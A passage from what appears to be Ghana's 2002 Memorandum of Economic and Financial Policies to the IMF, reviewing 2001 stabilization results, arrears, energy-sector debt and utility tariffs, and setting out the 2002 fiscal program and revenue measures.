The government has already taken a range of measures designed to strengthen revenue collection and administration, including the creation of a National Tax Audit Team and appointment of a head of the Revenue Agencies Governing Board (RAGB) to enhance coordination among the separate agencies. One task of the RAGB will be to ensure full implementation by CEPS and IRS of the common Taxpayer Identification Number (TIN) by June 2002. In addition, government intends to announce in the 2002 Budget plans to create a fully integrated Large Taxpayers Unit (LTU), with the purpose of amalgamating the assessment, processing, and auditing functions for all the tax liabilities of each large taxpayer. A timetable for creation of the LTU will be adopted by end-June 2002. While these measures will generate additional receipts over time, for reasons of prudence, no allowance for additional receipts has been made in the revenue projections for 2002. 18. The government will request that Ghana's increased revenue effort be supplemented by external debt relief under the enhanced HIPC Initiative. The total relief that Ghana could receive in 2002 is estimated at US$249 million (net of debt service on the deferral of 2001 payments), which is equivalent to about 4 percent of GDP. Of this, the portion ascribed to traditional debt relief mechanisms (US$153 million) has already been incorporated in the fiscal program for 2002. From the additional component (US$96 million) attributable to enhanced HIPC relief, 80 percent will be used to fund further poverty-related expenditures, as specified in the GPRS, and 20 percent to reduce domestic debt. 19. Net domestic financing of the government will not exceed 139 billion (0.3 percent of GDP) in 2002. This assumes program loans and grants of 1,313 billion and divestiture proceeds of 377 billion, in addition to the budgetary savings from projected debt relief. A financing gap of 427 billion remains, for which the government intends to seek additional concessional program support. To the extent that the realized sum of divestiture receipts and program loans and grants exceeds the amounts assumed in the fiscal program, the additional resources will be used to accelerate the process of domestic debt reduction, thereby making room for additional priority expenditures in subsequent years. If the aggregate receipts from program loans and grants 20. The government attaches the highest priority to the effective control and monitoring of public expenditure. The establishment of effective expenditure control, particularly at the commitment stage, is a central plank of the program for 2002, and is a prerequisite for ensuring the appropriate use of interim relief under the enhanced HIPC Initiative. The government will therefore implement, throughout 2002, the following procedures: To verify that these procedures are in place, the Ministry of Finance has issued to MDAs the disaggregated expenditure ceilings for the first quarter of 2002, and the CAGD has produced the reports specified above for the months of January-October 2001. 21. The stock of expenditure arrears on road projects continued to mount during 2001, contrary to the government's specified objective that this stock be sharply reduced. As a result, and pending the completion of ongoing audits of road arrears, the target date for their full clearance has been pushed back from March to June 2002. 
In support of this goal, the government will take steps to improve the control over expenditure commitments in the road sector by limiting certificates of continuation on ongoing projects and new certificates of commencement to the quarterly 2002 budget allocations for the Ministry of Roads, while ensuring that the stock of road arrears is cleared on schedule. The government will also seek to rescind those contracts for road construction that allow contractors willing to prefinance new projects to initiate work without prior authorization, since such contracts inhibit the government's ability to control its financial obligations. 22. The enhanced external debt monitoring practices adopted in 2001 (as described in the TMU) are in place and being followed. These include tighter control over the contracting of new government debt to ensure a grant element of at least 35 percent in all new borrowing, closer monitoring of external debt service obligations and payments, and a more systematic exchange of external debt information between the Ministry of Finance aid and debt management unit and the Bank of Ghana. Monetary, Exchange Rate and Financial Sector Policies 23. To achieve the target rate of inflation for end-2002, the Bank of Ghana will use appropriate monetary instruments to control growth in its net domestic assets, and hence in reserve money growth. The quarterly targets, consistent with reserve money growth during 2002 of 18.7 percent, are shown in Table 1. This should be sufficient to accommodate the target level for credit to the government and a rebuilding of net international reserves (NIR) by at least US$156 million. 24. The government and the Bank of Ghana have agreed that it is important, for the purposes of safeguarding the financial system as well as the public purse, that the finances of public enterprises and the impact of their operations on the banking system be more closely monitored. For this purpose, the Portfolio Management Unit in the Ministry of Finance will prepare quarterly reports for the Minister of Finance and the Governor of the Bank of Ghana on the financial positions of Cocobod, ECG, SSNIT, TOR, and VRA. 25. The functioning of the foreign exchange market has improved markedly in 2001, as monetary discipline has been restored and macroeconomic performance strengthened. The Bank of Ghana has maintained a policy of non-intervention in the exchange market, and has made no foreign exchange sales to the market other than those for oil imports, allowing the exchange rate to be determined by market forces. 26. Looking ahead, the Bank of Ghana intends to build on this progress and foster the development of an effective interbank foreign exchange market. It is important, however, to proceed cautiously and prepare the ground well. In particular, a viable market-based arrangement for financing oil imports must be secured before steps are taken to redirect cocoa proceeds, which are currently surrendered to the Bank of Ghana in large and discrete amounts, into the commercial banking system. A plan to this effect will be developed following consultations with commercial banks, during the first quarter of 2002, on the appropriate market structures and technical reforms needed to facilitate interbank trading in foreign exchange. C. Structural Policies for 2002 27. The government regards restoring the financial health of the public energy and utility companies as one of its highest priorities over the next 1-2 years. 
To prevent a recurrence of the huge parastatal losses built up in 1999 and 2000, which will be a burden on consumers and taxpayers for many years to come, the government intends to: So as not to further aggravate the finances of the parastatals, the government will remain current on its own payments for utilities and on the budget transfers needed to cover the implicit consumer subsidies. 28. A preliminary assessment indicates that the impact of the TOR debt restructuring has worked to lift pressure from the balance sheets of commercial banks and begin stabilizing TOR's own financial position. TOR's cash flow is expected to improve substantially when secondary distillation facilities come on line in the second half of 2002. Meanwhile the authorities are in discussions with private sector firms on a comprehensive agreement to assume full management of the refinery. The government also intends to consult with oil companies and other stakeholders with a view to the possible dismantling of TOR's monopoly of the import of petroleum products. This would enhance competition in the petroleum sector, as well as aiding development of the interbank foreign exchange market. 29. The government regards divestiture of state holdings in commercial enterprises as a core component of its strategy to promote private sector development. The agenda for 2002 includes: 30. To further its goal of improving the country's investment climate, the government is in the process of establishing an Investors' Advisory Council, the inaugural meeting of which is planned for April 2002. This body will be chaired by the President of Ghana, and will include top-level executives from the Ghanaian business community, multinational companies invested in Ghana, and other major international companies. Its broad objective is to provide a local and international investors' perspective on Ghana's strategy to stimulate growth and private investment, and recommend concrete measures to enhance the policy environment for business investment in Ghana. 31. In this same vein, the government intends to reduce progressively the distortions inherent in Ghana's import tariff regime, which are an impediment to efficient private sector activity. A key step will be the elimination of the special import tax in the 2002 Budget, to be replaced later with anti-dumping measures that are consistent with WTO rules. D. The PRSP and HIPC Processes 32. The Ghana Poverty Reduction Strategy is now expected to be completed in early 2002. This extension of the original timetable was made in order to allow sufficient time for the completion of public consultations and development of a costed, prioritized policy program. The work on the strategy had already advanced sufficiently, however, to provide a framework for expenditure allocations in the 2002 Budget. A progress report on development of the GPRS to date and the remaining steps to completion has been prepared by the government and will be provided for consideration along with the HIPC decision point document and request for the PRGF disbursement. E. Good Governance and Fiscal Transparency 33. The government came into office with a pledge of zero-tolerance for all acts of corruption. A new anti-corruption strategy has been put in place, including Codes of Conduct for state officials, establishment of an Office of Accountability in the President's office and the Parliament, reform of the procurement system, and strengthening of anti-corruption agencies. 
As part of these efforts, the BOG has instituted new procedures to counter money laundering , whereby suspicious transactions are reviewed, and third-party transfers are checked against a list of suspected organizations. A new anti-money laundering bill is also under preparation. 34. The government notes that the Bank of Ghana has published new monetary data, correcting the underrecording of reserve money in the old series. It welcomes the request by the new Governor that this year's external audit of the central bank be conducted by auditors of international standing and experience, as a signal of the new management's determination to ensure full and accurate data for policymaking purposes. The auditors were appointed in December 2001, and the financial audit is expected to be completed by end-March 2002. In addition, the Bank of Ghana has been implementing a series of measures to improve the quality and reliability of monetary statistics, with technical assistance from the IMF, and this work will continue during 2002. The government is also committed to improving progressively the quality and coverage of Ghana's fiscal data, as a means to strengthen policymaking and accountability. In pursuit of this objective, the government will draw upon a Report on Standards and Codes in Fiscal Transparency planned for Ghana during the first half of 2002 to define an agenda for action, not only on fiscal data but also on budget processes and reporting. As an initial step, all MDAs will be required, from the beginning of 2002, to report to the Ministry of Finance expenditures financed from internally generated funds (such as user fees) and from direct donor funding. In addition, the government will seek the agreement of donors to channel all donor resources through government accounts (including committed donor accounts) at the Bank of Ghana, as well as all internally generated funds, where permitted by law. This will be particularly important for the effective tracking of poverty-related expenditure, to which Ghana is committed as a prospective recipient of HIPC relief. 35. For transparency reasons, the government has also made provision in the 2002 budget for transfers to the electricity and water companies to cover estimated price subsidies implied by the phased transition to full cost recovery in these sectors. This ensures that the cost of the subsidies and their financing are made explicit, rather than accumulating as ever-larger debts in the public utilities, and will also facilitate better targeting of subsidies in favor of the poor. The transfers will be made to ECG and GWCL on a quarterly basis, one month after the end of the quarter. The conversion of part of TOR's bank debt into government bonds, which will be serviced in 2002 from the budget, similarly serves to improve the transparency of the public finances, and to increase TOR's accountability for its future financial performance. F. Program Monitoring for 2002 36. Technical Memorandum of Understanding. The program will be monitored using the definitions, data sources, and frequency of monitoring set out in the accompanying Technical Memorandum of Understanding (TMU). The government will make available to Fund staff all core data on a timely basis, as specified in the TMU. 37. Prior Actions. The government will undertake a number of actions prior to the IMF Board meetings on the fourth and fifth reviews under the PRGF in order to ensure effective implementation of the economic strategy described in this memorandum (Table I.2). 38. 
38. Performance criteria. Table I.1 shows the quantitative performance criteria and benchmarks set for June 2002, with indicative benchmarks for March, September, and December 2002. Structural performance criteria and benchmarks with corresponding dates are identified in Table I.2.

39. Program review. A fifth review under the PRGF arrangement will be completed by November 30, 2002. In addition to the specified prior actions, this review will focus on implementation of (i) the public expenditure management and control system, (ii) the steps to develop a functioning interbank foreign exchange market, and (iii) measures to further strengthen monetary and fiscal data systems.

Table I.2. Prior Actions, Structural Performance Criteria and Benchmarks

Prior Actions for Fourth Review

1. Full implementation of the specific duties on petroleum (averaging 200 per liter).
2. Issuance to MDAs of disaggregated expenditure ceilings for the first quarter of 2002, consistent with the fiscal targets for 2002.
3. Provision of CAGD reports for the months of January-October 2001 on aggregate budget outcomes and MDAs' expenditure commitments and cash outlays, showing deviations from the established quarterly ceilings and any accumulated arrears.
4. Completion of audits at the MDA level of the full stock of domestic expenditure arrears for January-August 2001, and adoption of a strategy for their liquidation.
5. Cabinet approval of revenue measures with a combined yield in 2002 of not less than 115 billion, for implementation with the 2002 Budget.
6. Commencement of the external financial audit of the Bank of Ghana.

Structural Performance Criteria

7. Elimination of the special import tax in the 2002 Budget, effective immediately (end-March 2002).
8. Announcement in the 2002 Budget of intent to create a full-service Large Taxpayers' Unit (LTU) for the 500 largest taxpayers, covering filing and payment, collection enforcement, and audit for all domestic tax liabilities, and adoption of a timetable for its establishment (end-June 2002).

Structural Benchmarks

9. Issuance of disaggregated expenditure ceilings for each MDA for the second, third, and fourth quarters of 2002, consistent with the budget and cash flow forecasts (end-April 2002).
10. Production by CAGD of monthly reports for November 2001-March 2002 on aggregate budget outcomes and MDAs' expenditure commitments and cash outlays, by function, with a maximum 6-week delay (end-May 2002).
11. Completion and publication of audit of 2000 non-road expenditure arrears (end-June 2002).

Prior Actions for Fifth Review

12. Passage of a Budget for 2002 in line with the program framework described in this memorandum, and of revenue measures consistent with that Budget.
13. Publication by the PURC of its strategy for achieving full cost recovery in the public utilities, and implementation of automatic tariff adjustment formulae for electricity and water.
14. Completion of an external audit of the Bank of Ghana's financial accounts for 2001.

Technical Memorandum of Understanding

1. This technical note contains definitions and adjuster mechanisms that are intended to clarify the measurement of items in Table I.1, Quantitative Performance Criteria, PRGF Arrangement, 2002, attached to the Memorandum of Economic and Financial Policies. Unless otherwise specified, all quantitative performance criteria and benchmarks will be evaluated in terms of cumulative flows from January 1, 2002.
2. Government is defined for the purposes of this memorandum to comprise the central government, as well as all special funds (the Education Trust Fund, the Road Fund, the District Assembly Common Fund) and various subvented and other government agencies that are classified as government in the Bank of Ghana (BOG) Statement of Accounts. Public enterprises, including Cocobod, are excluded from the definition of government.

4. Government domestic revenue comprises all tax and non-tax revenues of government (in domestic and foreign currency), excluding foreign grants and divestiture receipts. Revenue will be measured on a cash basis as the inflows to government uncommitted treasury collections accounts, plus positive balances on committed accounts of the government at the BOG.

5. Poverty-related expenditures refer to those expenditures identified in Table 6 of the Decision Point Document for the Enhanced Heavily Indebted Poor Countries Initiative. The last three digits of the chart of accounts are used to identify budget expenditures that are poverty-related and the sub-component which is financed by HIPC relief.

6. Net domestic financing of government is defined as the change in net credit to government by the banking system (i.e., the Bank of Ghana plus deposit money banks) plus the net change in holdings of treasury bills and other government securities by the nonbank sector, but excluding divestiture receipts, government liabilities assumed in the restructuring of the domestic debts of the Tema Oil Refinery, the Electricity Company of Ghana, the Volta River Authority, and the Ghana Water Company Limited, and/or recapitalization of the Bank of Ghana. Outstanding net credit to the government by the Bank of Ghana is comprised of the sum of claims on government (codes 401 and 50101-4) less government deposits (1101 and 1202 and the BOG open market operations account, as defined in the Template of the BOG Statement of Accounts provided to the IMF on January 24, 2002), including the HIPC account. Outstanding net credit by deposit money banks is comprised of DMB holdings of government securities at cash value, as reported by the BOG Treasury Department's Debt Registry, less government deposits reported by DMBs in their BSD2 report form (as defined in the template for reporting of DMBs provided to the IMF on January 24, 2002). For each test date, any adjustment by the BOG to the data reported by individual DMBs, on account of their misclassification of government or for other reasons, will be reported to the Fund.

7. The domestic primary balance is defined as the difference between government domestic revenue and noninterest government expenditure as reported by the CAGD (i.e., payment vouchers issued for expenditures on items 1-4), but excluding foreign-financed capital expenditure, for which data are reported by the Aid and Debt Management Unit, and expenditures to be financed by HIPC relief (i.e., those paid out of the HIPC Account of the CAGD; see below). The measurement will be on a cash basis, with any positive (negative) discrepancy between the above- and below-the-line measure of the overall balance being added to (subtracted from) the measure of the domestic primary balance.

8. The program exchange rate for the purposes of this memorandum will be 7205 cedis per dollar.
9. Reserve money is defined as the sum of currency in circulation (BOG statement of accounts codes 901 plus 902), commercial banks' deposits at the Bank of Ghana in cedis (code 110201, excluding overdrafts, banks in liquidation, and blocked accounts), and private and other non-government demand deposits at the Bank of Ghana in cedis (excluding blocked accounts). It will be measured by the indicated stock at end of month. If any bank fails to meet its legal reserve requirement, currently 9 percent of bank deposits, then reserve money will be adjusted upward to the extent of any shortfall in compliance with that reserve requirement.

10. Net foreign assets are defined for program monitoring purposes and in the monetary survey as short- and long-term foreign assets minus liabilities of the Bank of Ghana which are contracted with non-residents. Short-term foreign assets include: gold (valued at the spot market rate for gold, US$/fine ounce, London), holdings of SDRs, reserves and investments in the IMF, foreign notes and travelers checks, foreign securities, positive balances with correspondent banks, and other positive short-term or time deposits. Short-term foreign liabilities include foreign currency liabilities contracted by the Bank of Ghana at original maturities of one year or less (including overdrafts), plus outstanding liabilities to the IMF. Long-term foreign assets and liabilities are comprised of assets (303), investments abroad (a subset of 60101), liabilities (1204), and bilateral agreements (305), all excluding swap deals receivable and payable with resident commercial banks. All values are to be converted to U.S. dollars at actual market exchange rates prevailing at the test date.

11. Net international reserves of the Bank of Ghana are defined for program monitoring purposes and in the balance of payments as short-term foreign assets of the Bank of Ghana, net of its short-term external liabilities. To the extent that short-term foreign assets are not fully convertible external assets readily available to and controlled by the Bank of Ghana (i.e., they are pledged or otherwise encumbered external assets, including, but not limited to, assets used as collateral or guarantees for third-party liabilities), these will be excluded from the definition of NIR. Net international reserves are also defined to include net swap transactions (receivable less payable), minus positive foreign currency deposits by domestic non-government entities at the BOG (120501 and 120502). All values are to be converted to U.S. dollars at actual market exchange rates prevailing at the test date.

12. Net domestic assets of the Bank of Ghana are defined as the difference between reserve money and net foreign assets of the Bank of Ghana, converted from U.S. dollars to cedis at the program exchange rate.

13. The performance criterion on short-term external debt refers to the outstanding stock of external debt with original maturity of one year or less, including overdraft positions, owed or guaranteed by the government or the Bank of Ghana. Data on the Bank of Ghana's short-term external debt are those reported from the statement of accounts template as short-term liabilities to non-resident commercial banks (1201 plus 301 overdrafts plus Crown Agent). The limit on short-term external debt will exclude US$23 million in overdrafts with correspondent banks which are in dispute, until such time as these assets are re-classified.
14. The performance criterion on nonconcessional medium- and long-term external debt refers to the contracting or guaranteeing of external debt with original maturity of more than one year by the government or Bank of Ghana. [2] Medium- and long-term debt will be reported by the Aid and Debt Management Unit of the Ministry of Finance and (as appropriate) the Bank of Ghana, measured in U.S. dollars at current exchange rates.

15. The stock of payment arrears in the road sector at the end of August 2001 is recognized to be ¢279.8 billion and is expected to be paid down according to the schedule in Table I.1. Performance will be measured by the outstanding stock, measured in cedis, at the end of each quarter. Conversion of any arrears in foreign currencies into cedis will be made at the actual exchange rates prevailing at each test date.

16. External payment arrears occur when undisputed interest or amortization payments are not made within the terms of the debt contract. Bilateral and commercial debt service payments that are subject to the deferral agreed with the Paris Club on December 10, 2001, or the rescheduling associated with the provision of interim HIPC relief, are not considered external arrears for program purposes. This is a continuous criterion.

17. Official external program support is defined as grants and loans provided by foreign official entities that are received by the budget, excluding project grants and loans, and other exceptional financing. Amounts assumed in the program consistent with this definition are shown in the memorandum item entitled "external program support" of Table I.1.

18. Divestiture receipts are payments received by the government (in domestic and foreign currency) in connection with the sale of state assets. The programmed amounts consistent with this definition are shown in Table I.1. Divestiture receipts in foreign exchange are those recorded as such in the Bank of Ghana's Cash Flow.

19. The automatic adjustment formula for petroleum prices, which was implemented in June 2001 and will operate continuously during the program period, is defined to pass through to ex-refinery prices the net cedi cost of refined petroleum product imports, to ensure full cost recovery at the Tema Oil Refinery (including financial charges, except charges on debt subject to assumption by the government in 2001). From March 2002, the formula will include a petroleum debt service charge, equal to 95 percent of any decline in oil import costs from the average level prevailing during November 27-December 26, 2001.

Adjusters

20. Deviations in official external program support, external debt service payments, and divestiture receipts from the amounts programmed in Table I.1 will trigger adjusters for domestic financing of government, net domestic assets of the Bank of Ghana, and net international reserves, as indicated below. These and other adjusters as set out below will be measured cumulatively from the beginning of 2002.

21. The adjustment to the ceiling on the NDA of the Bank of Ghana with respect to deviations in divestiture receipts will apply only to foreign exchange receipts. Both ceilings will be increased by 100 percent of any cumulative shortfall in official external program support or excess in external debt service, but will not be adjusted for a shortfall in divestiture receipts. The upward adjustment is capped at the equivalent of US$75 million, converted to cedis at actual exchange rates.
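Two of the definitions above reduce to simple formulas (notation ours, not the memorandum's). The petroleum debt service charge of paragraph 19, with \( \bar{C} \) the average net oil import cost over November 27-December 26, 2001 and \( C_t \) the cost at test date \( t \):

\[ \text{charge}_t = 0.95 \times \max(0,\ \bar{C} - C_t) \]

And the ceiling adjuster of paragraph 21, with \( S_t \) the cumulative shortfall in official external program support and \( X_t \) the cumulative excess in external debt service, both measured from the beginning of 2002:

\[ \text{adjustment}_t = \min(S_t + X_t,\ \text{US\$75 million}) \]

converted to cedis at actual exchange rates. (Whether \( S \) and \( X \) add or apply separately is not spelled out in the text above; in any case, the cap binds the total upward adjustment.)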
22. [...] $75 million.

Reporting of Fiscal Data

21. The Ministry of Finance will provide to IMF staff:

a) Monthly data on central budget operations for revenues, expenditure, and financing, with a lag of no more than 6 weeks after the end of the month.

b) Monthly reports showing the functional breakdown by Ministry, Department, and Agency of expenditure authorizations, payment vouchers issued, payment vouchers liquidated, and arrears, with a lag of no more than 6 weeks after the end of the month. These reports will also identify poverty-related and HIPC-financed expenditures, as well as the inflows and disbursements from the HIPC account at the BOG.

c) CAGD monthly reports on the profile of central government revenues and expenditure (payment vouchers issued), with a lag of no more than 6 weeks after the end of the month.

d) Monthly reports prepared by the Ministry of Road and Highways on the stock of road arrears, with a lag of no more than 4 weeks after the end of the month.

e) Quarterly reports (from the Portfolio Management Unit) on the financial positions of Cocoabod, ECG, SSNIT, TOR and VRA, with a lag of no more than 8 weeks after the end of the month.

22. The BOG will provide to IMF staff:

a) Monthly summary tables reporting the government's position on BOG committed and uncommitted accounts, as well as financing, within 4 weeks of the end of the month. This table should be accompanied by a table showing the composition of other receipts and other expenditure.

b) Monthly tables showing the composition of banking system and non-banking system net claims on government, within 4 weeks of the end of the month.

c) Monthly tables showing the structure and holders of domestic government debt, within 4 weeks of the end of the month.

External Debt and Debt Service and HIPC Relief

23. [...], and to the IMF staff on a monthly basis. [...]

g) A HIPC account has been established at the BOG for the receipt and disbursement of HIPC relief. When each debt service payment falls due, the Government of Ghana (or the BOG for IMF repurchases) will transfer to the HIPC account that proportion of the amount due which, under the terms of the HIPC Initiative, does not have to be paid to the creditor. For debt owed by public enterprises under the HIPC Initiative, the Government of Ghana will transfer to the HIPC account the debt-relieved portion of the debt service payment if the enterprise fails to do so on the due date. ADMU will issue, in advance of the due date, a request for payment to the CAGD indicating the portions due to the creditor and the HIPC account. ADMU will prepare a monthly report indicating for the coming month (i) the total debt service due by creditor, (ii) the amount of HIPC relief on each transaction, as well as (iii) the debt service paid and the transfers to the HIPC account by creditor for the previous month. This report will be provided within 2 weeks of end-month to the CAGD and to the IMF.
http://www.imf.org/external/np/loi/2002/gha/01/index.htm
CC-MAIN-2016-30
en
refinedweb
I am having a problem selecting dates from a database at the office. I seem to be unable to select anything on the EDT switchover. I have tried various JDBC versions and it always seems to be wrong. Below is my output, followed by the code.

I would expect to see this:

2012-03-11 02:24:00.0
2012-03-11 03:24:00.0

What I get
-----------------------------
ojdbc14-10.1.0.2.0.jar
2012-03-11 01:24:00.0
2012-03-11 03:24:00.0

ojdbc6_g-11.2.0.2.0.jar
2012-03-11 03:24:00.0
2012-03-11 03:24:00.0

ojdbc6_g-11.2.0.3.jar
2012-03-11 03:24:00.0
2012-03-11 03:24:00.0

import java.sql.*;

public class JDBCTest {
    public static void main(String[] args) throws SQLException {
        DriverManager.registerDriver(new oracle.jdbc.OracleDriver());

        ResultSet bat = DriverManager.
            getConnection("--JDBCURL--", "username", "password").
            prepareCall("select to_date('3/11/2012 02:24:00','mm/dd/yyyy HH:MI:SS') theDate from dual").
            executeQuery();
        bat.next();
        System.out.println(bat.getTimestamp("theDate"));

        ResultSet man = DriverManager.
            getConnection("--JDBCURL--", "username", "password").
            prepareCall("select to_date('3/11/2012 03:24:00','mm/dd/yyyy HH:MI:SS') theDate from dual").
            executeQuery();
        man.next();
        System.out.println(man.getTimestamp("theDate"));
    }
}

Any ideas on what could be going wrong? What kind of stuff should I be looking at in the DB environment? Is this a potential bug I should file somewhere? Thanks
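For context (this note is not part of the original thread): 2012-03-11 is the US spring-forward date, so wall-clock times between 02:00 and 03:00 US Eastern do not exist that day, and different driver versions normalize the nonexistent 02:24 differently. A minimal sketch of one way to sidestep the JVM-default-timezone conversion, using the two-argument getTimestamp with an explicit UTC Calendar (the column name matches the query above; everything else is illustrative):

import java.sql.*;
import java.util.Calendar;
import java.util.TimeZone;

public class DstSafeRead {
    public static void main(String[] args) throws SQLException {
        Connection conn = DriverManager.getConnection("--JDBCURL--", "username", "password");
        ResultSet rs = conn.
            prepareCall("select to_date('3/11/2012 02:24:00','mm/dd/yyyy HH:MI:SS') theDate from dual").
            executeQuery();
        rs.next();
        // Materialize the DATE in a zone without DST gaps instead of the
        // JVM default (US Eastern), where 02:24 does not exist on this day.
        Calendar utc = Calendar.getInstance(TimeZone.getTimeZone("UTC"));
        System.out.println(rs.getTimestamp("theDate", utc));
    }
}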
https://community.oracle.com/thread/2419602?tstart=225
CC-MAIN-2016-30
en
refinedweb
jQuery UI makes creating tabbed areas very easy, so the framework is based on that. But we are on our own as far as Next/Previous buttons. Fortunately, jQuery UI tabs do have a function-thing that can be called to switch tabs. We can bind it to text links to accomplish switching tabs:

$('#my-text-link').click(function() { // bind click event to link
    $tabs.tabs('select', 2); // switch to third tab
    return false;
});

But we want to do this (hopefully) as smartly as we can. So we want to:

- Add the links dynamically to each panel. If a panel is added or removed, the Next/Previous buttons automatically adjust to the new flow. Plus, links won't be there awkwardly with JavaScript disabled
- Make sure there is no "Previous" button on the first panel
- Make sure there is no "Next" button on the last panel

This is how I did it:

var $tabs = $("#tabs").tabs();

$(".ui-tabs-panel").each(function (i) {
    var totalSize = $(".ui-tabs-panel").size() - 1;
    if (i != totalSize) {
        next = i + 1;
        $(this).append("<a href='#' class='next-tab mover' rel='" + next + "'>Next Page &#187;</a>");
    }
    if (i != 0) {
        prev = i - 1;
        $(this).append("<a href='#' class='prev-tab mover' rel='" + prev + "'>&#171; Prev Page</a>");
    }
});

$('.next-tab, .prev-tab').click(function () {
    $tabs.tabs('select', parseInt($(this).attr("rel"), 10));
    return false;
});

I was implementing something like this on a client's site today. This is a much better solution. Thanks!

I use another version of tab-based content; but I really like this inclusion of previous / next. I wonder though… if there is a way to have the previous / next buttons instead take on the title of the tab they are navigating to. In terms of user-friendly navigation, that would be the most comprehensive option - users would know exactly where they were going using either the prev / next tab options, or the upper navigation.

That would be a clever idea, I'll look into that, I'm sure it's possible.

I like the idea of that Rob. I need a solution that allows me to have names for the tabs. Then it's more like a walk-through with semantic writing that a user can understand. After all, who knows which information is associated with which #. It would avoid the: "Crap I messed up on the contact form… Uhh which number was it again? click click click click."

Take a look at this demo in IE 7. The Next/Previous tabs are out of whack. Other than that thanks for the code!

thanks for sharing

Wouldn't it be better to do this in php instead? Since it's almost the same solution but better for screen readers and browsers that don't use js? Less debugging too… But otherwise a nifty solution if that is what you're looking for, thanks Chris :)

The tabs need JavaScript to work anyway though….

not working in IE7

I think you need to add .ui-tabs .ui-tabs-panel {overflow:auto} I think that will fix the bug. Not tested though.

so I have done some testing and I have found a few different ways to make it work. you can float the display left and add a width of 100%. The only problem is that you need to set a static height to get this to work. I also tried to put a div wrap around it to create the needed space; that didn't work very well. then I tried to hack it by adding padding to the div that was wrapping the display; that worked but made the space pretty large in FF. well I am done playing around with this and would love to hear how this prob gets fixed. it is probably a little one-line fix that I didn't think to try. well thanks as always Chris.

I was playing with this in Firefox 3, very awesome, but it alternates between horizontal/vertical scrolls on and off, even if there is no content change between tabs. Otherwise it's a grand tutorial!

Thanks for this. Quick question, how would you add a fading animation to the content when the tabs change?

There are plenty much better tab-based stuff:

Great post, tabs are the most used web interface on the web these days. Thnx for sharing

Thanks Chris! It's a nice effect

Nice idea.
If you want to use only two links outside of the tabs instead of adding the next & previous links in each tab, you can also use $tabs.data('selected.tabs'); to retrieve the index of the currently selected tab, and use the 'tabsselect' event to enable / disable the links.

This solution makes sense… thanks for the idea!!!

The solution is elegant indeed. Thank you for the post.

i like this thank you

I was hoping for an ExtJS-style tab

Problem is that hiding content like this is actually bad for user experience if one comes from a search engine searching for hidden content. I wrote a blog post about it a few months ago: A fundamental problem with Ajax websites and hiding content

also you face an accessibility problem for people with javascript turned off unless you use the css preloaded technique CSS Preloaded

Nice solution! My only recommendation is to declare the variables 'i', 'next' and 'prev' with var. Since those aren't declared with var they're put into the global namespace.

Really thankful for this elegant solution.

it will be pretty when you add images on each tab.

thanks a lot, but can I increase the content width inside the tab?

Moreover, select is deprecated now. So we have to use the "active" parameter for getting and setting the active tab. Here is the JS part of the code (a sketch is shown below); you should have "a href" tags added in your tabs div with "btnPrev" and "btnNext" classes.

hello everybody i'm having a problem could you help me sir? i put this ui-tabs inside of "spry tabbed panels" the 1st tab it works great but the other tabs have an error.. it is not working =( please help me thank you in advance

Do you have a link or example?

There are so many tabs, but I think the jQuery UI Tabs is best for me. Thanks for your TUT

How can I do it automatically, for example every 5 seconds? Thanks

It is working fine. It's lovely. I am loving it.
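A minimal sketch of the variant described in the comment above, assuming jQuery UI 1.9+ (where the deprecated 'select' method is replaced by the 'active' option) and links carrying the btnPrev/btnNext classes the commenter mentions:

var $tabs = $("#tabs").tabs();

$(".btnNext").click(function () {
    // advance to the next tab, wrapping past the last one
    var active = $tabs.tabs("option", "active");
    var count = $tabs.find(".ui-tabs-panel").length;
    $tabs.tabs("option", "active", (active + 1) % count);
    return false;
});

$(".btnPrev").click(function () {
    var active = $tabs.tabs("option", "active");
    var count = $tabs.find(".ui-tabs-panel").length;
    $tabs.tabs("option", "active", (active - 1 + count) % count);
    return false;
});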
https://css-tricks.com/jquery-ui-tabs-with-nextprevious/
CC-MAIN-2016-30
en
refinedweb
sandman 0.9.8!

Documentation
-------------

`Sandman documentation <https://sandman.readthedocs.org/>`__

Supported Databases
-------------------

``sandman``, by default, supports connections to the same set of databases as `SQLAlchemy <http://www.sqlalchemy.org/>`__. As of this writing, that includes:

- MySQL (MariaDB)
- PostgreSQL
- SQLite
- Oracle
- Microsoft SQL Server
- Firebird
- Drizzle
- Sybase
- IBM DB2
- SAP Sybase SQL Anywhere
- MonetDB

Authentication
--------------

As of version 0.9.3, ``sandman`` fully supports HTTP Basic Authentication! See the documentation for more details.

[Figure: admin interface screenshot]

(If you want to disable the browser from opening automatically each time ``sandman`` starts, call ``activate`` with ``browser=False``)

If you wanted to specify specific tables that ``sandman`` should make available, how do you do that? With this little ditty:

.. code:: python

    from sandman.model import register, Model

    class Artist(Model):
        __tablename__ = 'Artist'

    class Album(Model):
        __tablename__ = 'Album'

    class Playlist(Model):
        __tablename__ = 'Playlist'

    register((Artist, Album, Playlist))

And if you wanted to add custom logic for an endpoint? Or change the endpoint name? Or change your top-level JSON object?

.. code:: python

    class Genre(Model):
        __tablename__ = 'Genre'
        __top_level_json_name__ = 'Genres'

The examples use the `Chinook <http://chinookdatabase.codeplex.com/>`__ sample SQL database.

Contact Me
----------

Questions or comments about ``sandman``? Hit me up at [email protected].

Changelog
=========

Version 0.9.8
-------------

- Support for the ``wheel`` distribution format.
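A minimal run sketch tying the pieces above together. The connection URI and port are illustrative, and the import layout is an assumption based on the snippets above (``sandman.model`` providing ``activate``, with the Flask ``app`` exported by the package); ``browser=False`` is the flag mentioned earlier:

.. code:: python

    from sandman import app
    from sandman.model import activate

    # point sandman at an existing database; the URI here is illustrative
    app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///chinook.sqlite3'

    # introspect the schema and expose REST endpoints, without opening a browser
    activate(browser=False)

    app.run('0.0.0.0', port=8080)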
https://pypi.python.org/pypi/sandman/0.9.8
CC-MAIN-2016-30
en
refinedweb
iSkeletonBone Struct Reference

The skeleton bone class. More...

#include <imesh/skeleton.h>

Inheritance diagram for iSkeletonBone:

Detailed Description

The skeleton bone class.

Definition at line 60 of file skeleton.h.

Member Function Documentation

- Find child bone by name.
- Find child bone index.
- Set child bone by index.
- Get number of children bones.
- Get skeleton factory.
- Set full transform of the bone.
- Get name of the bone.
- Get parent bone.
- Get skin bbox.
- Get transform of the bone.
- Get bone transform mode.
- Get update callback.
- Set name of the bone.
- Set parent bone.
- Set skin bbox (useful for creating collider or ragdoll object).
- Set transform of the bone in parent's coordsys.
- Set bone transform mode.
- Set callback to the bone. By default there is a callback that sets bone transform when updating.

The documentation for this struct was generated from the following file:

- imesh/skeleton.h

Generated for Crystal Space 1.0.2 by doxygen 1.4.7
